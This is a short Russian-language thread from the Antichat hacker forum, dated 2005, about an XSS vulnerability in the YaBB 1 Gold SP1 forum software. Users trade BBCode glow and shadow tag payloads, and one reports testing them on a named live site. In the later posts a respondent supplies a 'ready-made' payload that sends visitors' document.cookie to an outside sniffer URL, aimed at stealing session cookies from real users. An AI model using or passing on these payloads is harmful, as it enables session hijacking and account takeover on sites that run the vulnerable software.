Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Уязвимость, YaBB 1 Gold - SP1, XSS атака. (https://forum.antichat.xyz/showthread.php?t=11695)

Romaxa55 13.12.2005 00:18
Уязвимость, YaBB 1 Gold - SP1, XSS атака.
 
Код:
[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]
или

Код:
[shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]
Что не так в этом коде, проверял на http://www.mgapi.ru/cgi-bin/yabb/
Код:
[glow=red);background:url(javascript:img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie);filter:glow(color=red,2,300]Big Exploit[/glow]

FQziT 13.12.2005 00:39
Так. Ну это алерт, а тебе нужно, чтобы приходили куки на сниффер, да? Ну тогда подумай головой=)) Нужно вместо
Код HTML:
alert(document.cookie)
вставить свой код. К примеру,
Код HTML:
document.location.href='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie
Но это только пример=)) Попробуй, может получится-)
Не забываем про РЕПУТАЦИЮ!

Цитата:
Код HTML:
[glow=red);background:url(javascript:new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie);filter:glow(color=red,2,3  00]Big Exploit[/glow]
Это уже готовое.

И не надо изподтишка сообщение редактировать, ок? Я ответил на вопрос, уже новым сообщением пиши, а не редактируй старое!

Romaxa55 13.12.2005 00:57
Да спасиб, но проблемма в том что, нет знаний в этой области, вот токо начал изучать.. ща попробую что нить.. Спасиб

FQziT 13.12.2005 01:04
Romaxa55 Всегда пожалуйста=)

Romaxa55 13.12.2005 01:25
Думаю тема закрыта, еще раз спасибо FQziT


Время: 22:06